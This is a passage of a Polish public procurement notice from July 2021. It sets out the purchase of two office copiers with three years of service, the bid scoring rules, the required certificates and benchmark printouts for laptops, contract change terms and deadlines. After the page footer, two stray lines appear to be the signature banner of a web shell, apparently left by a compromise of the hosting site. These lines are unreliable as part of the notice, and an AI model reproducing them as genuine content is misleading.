kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa urządzeń wielofunkcyjnych wraz z usługą serwisową.<br/>1)	Przedmiotem zamówienia jest zakup i dostawa 2 sztuk jednakowych, fabrycznie nowych, w pełni sprawnych, nienoszących śladów uszkodzeń zewnętrznych oraz uprzedniego używania, cyfrowych wielofunkcyjnych urządzeń kopiujących.<br/>2)	Zamówienie obejmuje dostawę, instalację urządzeń w siedzibie Zamawiającego, tj.: Warszawa, ul. Ogrodowa 5/7; wsparcie eksploatacyjne (materiały eksploatacyjne z wyjątkiem papieru) oraz serwis i konserwację urządzeń przez okres 36 miesięcy, zwanych dalej „Urządzeniami”<br/>3)	Dla wyspecyfikowanych urządzeń podane parametry są wartościami minimalnymi, każde urządzenie o parametrach lepszych, wyższych od wyspecyfikowanych spełnia wymagania określone przez Zamawiającego. Wszystkie urządzenia powinny spełniać wszelkie przepisy dotyczące prawa dopuszczenia do użytkowania w Polsce oraz posiadać stosowne dokumenty świadczące o spełnianiu wszystkich niezbędnych norm i wytycznych, które powinny spełniać ww. urządzenia przed dopuszczeniem go do użytkowania. <br/>4)	Pozostałe istotne wymagania Zamawiającego, co do przedmiotu zamówienia i realizacji umowy zostały zawarte we wzorze umowy stanowiącym załącznik nr 4 b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30121200-5 - Urządzenia fotokopiujące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30125120-8 - Toner do fotokopiarek</p> <p class="mb-0">50313000-2 - Konserwacja i naprawa maszyn reprograficznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wynikiem dla każdej z ofert będzie suma punktów uzyskanych w podanych wyżej kryteriach.<br/>1) Kryterium ceny C=( Cn/Cb)x60<br/>gdzie:<br/>C – ilość punktów za cenę brutto (max 60 pkt.)<br/>Cn – cena brutto najniższa wśród ofert <br/>Cb – cena brutto badanej oferty<br/><br/>2) Kryterium terminu gwarancji G (max 20 pkt.) <br/>Liczba punktów za kryterium termin realizacji zostanie obliczona wg następujących zasad:<br/> 24 miesiące – 0 pkt. <br/> 30 miesięcy – 10 pkt. <br/> 36 miesięcy – 20 pkt.<br/>Minimalny okres gwarancji wynosi 24 miesiące od daty podpisania protokołu odbioru Urządzeń.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące – oferta takiego Wykonawcy zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/>W przypadku, gdy Wykonawca nie wskaże oferowanego okresu gwarancji, Zamawiający uzna, że Wykonawca zaoferował minimalny wskazany przez Zamawiającego okres gwarancji, tj. 24 miesiące, wówczas w kryterium „termin gwarancji” otrzyma 0 pkt.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy Zamawiający wpisze ten termin w §6 ust 1 projektu umowy, stanowiącej załącznik nr 4b do SWZ, natomiast do celów oceny ofert uzna, iż Wykonawca zaoferował okres gwarancji wynoszący 36 miesięcy.<br/>3)	Kryterium Czas reakcji R (max 20 pkt.)<br/><br/>Liczba punktów w kryterium „Czas reakcji” - będzie liczona w następujący sposób:<br/>1.	w przypadku, gdy Wykonawca zadeklaruje czas reakcji do 36 godzin roboczych* włącznie	0 pkt<br/>2.	w przypadku, gdy Wykonawca zadeklaruje czas reakcji do 24 godzin roboczych* włącznie	10 pkt<br/>3.	w przypadku, gdy Wykonawca zadeklaruje czas reakcji do 12 godzin roboczych* włącznie	20 pkt<br/><br/>* Przez godzinę roboczą Zamawiający rozumie jedną godzinę (60 minut) pracy Wykonawcy w przedziale czasowym 7:30 – 15:30. <br/>Maksymalny czas reakcji (przybycie serwisanta) wynosi 36 godzin roboczych włącznie.<br/>Jeżeli Wykonawca zaoferuje czas reakcji powyżej 36 godzin roboczych, wówczas jego oferta zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/>Jeżeli Wykonawca nie wskaże w Formularzu ofertowym czasu reakcji, przyjmuje się, że Wykonawca zaproponował maksymalny czas reakcji, tj. 36 godzin roboczych liczony od momentu zgłoszenia awarii przez Zamawiającego, wówczas w kryterium „czas usunięcia awarii” otrzyma 0 pkt.<br/>Jeżeli Wykonawca zaoferuje czas reakcji poniżej 12 godzin roboczych, Zamawiający wpisze ten termin do załącznika nr 4 do projektu umowy, (załącznik nr 4b do SWZ), natomiast do celów oceny ofert uzna, iż Wykonawca zaoferował czas reakcji wynoszący 12 godzin roboczych włącznie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dotyczy części I oraz II zamówienia. <br/>w zakresie części nr I:<br/>−	wydruk ze strony serwisu http://www.cpubenchmark.net/ potwierdzający, że zaoferowany procesor uzyskuje w teście PassMark CPU Mark wynik min. 10050 punktów, musi być sporządzony w okresie od dnia zamieszczenia ogłoszenia o zamówieniu w BZP do terminu składania ofert,<br/>−	certyfikat ISO 9001 lub równoważny dla producenta komputerów przenośnych,<br/>−	certyfikat ISO 14001 lub równoważny dla producenta komputerów przenośnych,<br/>−	deklaracja zgodności CE dla komputera przenośnego oraz monitora,<br/>−	oświadczenie producenta potwierdzające spełnianie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych dla komputera przenośnego oraz monitora,<br/>−	certyfikat TCO 03 dla oferowanego monitora lub dokumentu równoważnego potwierdzającego spełnienie tej normy. <br/>W przypadku zaoferowania równoważnego systemu operacyjnego oraz oprogramowania opisanego przez Zamawiającego w załączniku nr 5 do SWZ, Wykonawca zobowiązany będzie do dołączenia do oferty wykazu rozwiązań równoważnych z jego opisem. <br/><br/>w zakresie części nr II:<br/>−	wydruk ze strony serwisu http://www.cpubenchmark.net/ potwierdzający, że zaoferowany procesor uzyskuje w teście PassMark CPU Mark wynik min. 10580 punktów, musi być sporządzony w okresie od dnia zamieszczenia ogłoszenia o zamówieniu w BZP do terminu składania ofert,<br/>−	certyfikat ISO 9001 lub równoważny dla producenta komputerów przenośnych,<br/>−	certyfikat ISO 14001 lub równoważny dla producenta komputerów przenośnych,<br/>−	deklaracja zgodności CE dla komputera przenośnego oraz monitora,<br/>−	oświadczenie producenta potwierdzające spełnianie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych dla komputera przenośnego oraz monitora,<br/>−	certyfikat TCO 03 dla oferowanego monitora lub dokumentu równoważnego potwierdzającego spełnienie tej normy.<br/>W przypadku zaoferowania równoważnego systemu operacyjnego oraz oprogramowania opisanego przez Zamawiającego w załączniku nr 5 do SWZ, Wykonawca zobowiązany będzie do dołączenia do oferty wykazu rozwiązań równoważnych z jego opisem. <br/><br/>Dokumenty i oświadczenia składane przez Wykonawcę powinny być w języku polskim. W przypadku składania dokumentów sporządzonych w innym języku, Wykonawca zobowiązany jest złożyć dokumenty wraz z tłumaczeniem na język polski. <br/>Zamawiający dopuszcza złożenie wydruku ze strony serwisu http://www.cpubenchmark.net/ potwierdzający, że zaoferowany procesor uzyskuje w teście PassMark CPU Mark wymagany wynik – bez tłumaczenia na język polski. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dotyczy części I oraz II zamówienia. <br/>w zakresie części nr I:<br/>−	wydruk ze strony serwisu http://www.cpubenchmark.net/ potwierdzający, że zaoferowany procesor uzyskuje w teście PassMark CPU Mark wynik min. 10050 punktów, musi być sporządzony w okresie od dnia zamieszczenia ogłoszenia o zamówieniu w BZP do terminu składania ofert,<br/>−	certyfikat ISO 9001 lub równoważny dla producenta komputerów przenośnych,<br/>−	certyfikat ISO 14001 lub równoważny dla producenta komputerów przenośnych,<br/>−	deklaracja zgodności CE dla komputera przenośnego oraz monitora,<br/>−	oświadczenie producenta potwierdzające spełnianie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych dla komputera przenośnego oraz monitora,<br/>−	certyfikat TCO 03 dla oferowanego monitora lub dokumentu równoważnego potwierdzającego spełnienie tej normy. <br/>W przypadku zaoferowania równoważnego systemu operacyjnego oraz oprogramowania opisanego przez Zamawiającego w załączniku nr 5 do SWZ, Wykonawca zobowiązany będzie do dołączenia do oferty wykazu rozwiązań równoważnych z jego opisem. <br/><br/>w zakresie części nr II:<br/>−	wydruk ze strony serwisu http://www.cpubenchmark.net/ potwierdzający, że zaoferowany procesor uzyskuje w teście PassMark CPU Mark wynik min. 10580 punktów, <br/>musi być sporządzony w okresie od dnia zamieszczenia ogłoszenia o zamówieniu w BZP do terminu składania ofert,<br/>−	certyfikat ISO 9001 lub równoważny dla producenta komputerów przenośnych,<br/>−	certyfikat ISO 14001 lub równoważny dla producenta komputerów przenośnych,<br/>−	deklaracja zgodności CE dla komputera przenośnego oraz monitora,<br/>−	oświadczenie producenta potwierdzające spełnianie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych dla komputera przenośnego oraz monitora,<br/>−	certyfikat TCO 03 dla oferowanego monitora lub dokumentu równoważnego potwierdzającego spełnienie tej normy.<br/>W przypadku zaoferowania równoważnego systemu operacyjnego oraz oprogramowania opisanego przez Zamawiającego w załączniku nr 5 do SWZ, Wykonawca zobowiązany będzie do dołączenia do oferty wykazu rozwiązań równoważnych z jego opisem. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Wypełniony Formularz ofertowy, odpowiednio dla danej części (załącznik nr 1 dla części I i II, załącznik nr 2 dla części III);<br/>2)	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców;<br/>3)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>4)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferty składane wspólnie (konsorcjum, spółka cywilna itp.):<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia;<br/>2)	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy;<br/>3)	Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo;<br/>4)	Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp.;<br/>5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>6)	Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania: oferta wspólna powinna być sporządzona zgodnie z SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dla części I oraz II: W trakcie obowiązywania niniejszej Umowy Strony dopuszczają możliwość dokonywania zmian zgodnych z art. 455 ustawy Pzp. <br/>2.	W przypadku zaprzestania produkcji Sprzętu o parametrach określonych przez Zamawiającego <br/>w Specyfikacji technicznej, stanowiącej Załącznik nr 1 do niniejszej Umowy, Zamawiający dopuszcza możliwość dokonania zmian Umowy w zakresie modelu Sprzętu. W takim przypadku Wykonawca ma obowiązek dostarczenia Zamawiającemu Sprzętu tego samego rodzaju, <br/>o parametrach identycznych lub lepszych od Sprzętu pierwotnie zaoferowanego przez Wykonawcę. Dokonanie zmiany, o której mowa powyżej wymaga uprzedniej pisemnej zgody Zamawiającego.<br/>3.	Wszelkie uzupełnienia oraz zmiany treści niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem § 2 ust. 4, § 5 ust. 12, § 14 ust. 1 niniejszej umowy.<br/><br/>Dla części III: 1.W trakcie obowiązywania niniejszej Umowy Strony dopuszczają możliwość dokonywania zmian zgodnych z art. 455 ustawy Pzp. <br/>2.	W przypadku zaprzestania produkcji Urządzeń o parametrach określonych przez Zamawiającego w Opisie przedmiotu zamówienia, stanowiącym Załącznik nr 1 do niniejszej Umowy, Zamawiający dopuszcza możliwość dokonania zmian niniejszej Umowy w zakresie modelu Urządzenia. W takim przypadku Wykonawca ma obowiązek dostarczenia Zamawiającemu Urządzenia tego samego rodzaju, o parametrach identycznych lub lepszych od Urządzenia pierwotnie zaoferowanego przez Wykonawcę. Dokonanie zmiany, o której mowa powyżej wymaga uprzedniej pisemnej zgody Zamawiającego.<br/>3.	Wszelkie uzupełnienia oraz zmiany treści niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem § 4 ust. 13, § 11 ust. 4, § 14 ust. 1 niniejszej Umowy.<br/>4.	Strony dopuszczają możliwość przedłużenia terminu realizacji przedmiotu umowy określonego w § 1 ust. 1 pkt 2 niniejszej Umowy, w przypadku, gdy w pierwotnym terminie jej obowiązywania, nie zostanie wyczerpana kwota, o której mowa w § 4 ust. 4 niniejszej Umowy do czasu wyczerpania ww. kwoty.<br/>Klauzule waloryzacyjne – dotyczące usługi określonej w § 1 ust.1 pkt 2 zostały opisane w § 9 umowy - stanowiącej załącznik 4b do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wfosigw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> dotyczy terminu wykonania zamówienia dla części III: dostawa do 8 tygodni (56 dni) od dnia podpisania Umowy. Serwis i konserwacja urządzeń realizowana będzie na warunkach określonych w umowie przez okres 36 miesięcy licząc od dnia podpisania protokołu odbioru każdego Urządzenia.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com